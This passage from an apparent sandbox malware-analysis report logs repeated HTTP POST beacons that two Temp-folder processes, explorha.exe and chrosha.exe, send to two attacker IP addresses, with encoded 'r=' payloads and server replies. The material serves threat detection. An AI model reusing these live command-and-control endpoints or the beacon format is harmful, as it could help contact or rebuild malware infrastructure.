                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1037192.168.2.550891193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.547676086 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.787472963 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1038192.168.2.550892193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.969702005 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.216371059 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1039192.168.2.550893193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.041735888 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.296123028 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1040192.168.2.550894193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.481431961 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.739223003 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1041192.168.2.550895193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.665656090 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.914567947 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1042192.168.2.550896193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.105317116 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.354285002 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1043192.168.2.550897193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.161844969 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.410968065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1044192.168.2.550898193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.606901884 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.860388041 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1045192.168.2.550899193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.774112940 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.020931005 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1046192.168.2.550900193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.227557898 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.472685099 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1047192.168.2.550901193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.274974108 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.526151896 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1048192.168.2.550902193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.727989912 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.982733965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1049192.168.2.550903193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.879359961 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:48.122843027 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1050192.168.2.550904193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:48.357394934 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:48.608165979 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1051192.168.2.550905193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:48.374752998 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:48.626183033 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1052192.168.2.550906193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:48.866621971 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:49.124429941 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1053192.168.2.550907193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:48.980145931 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
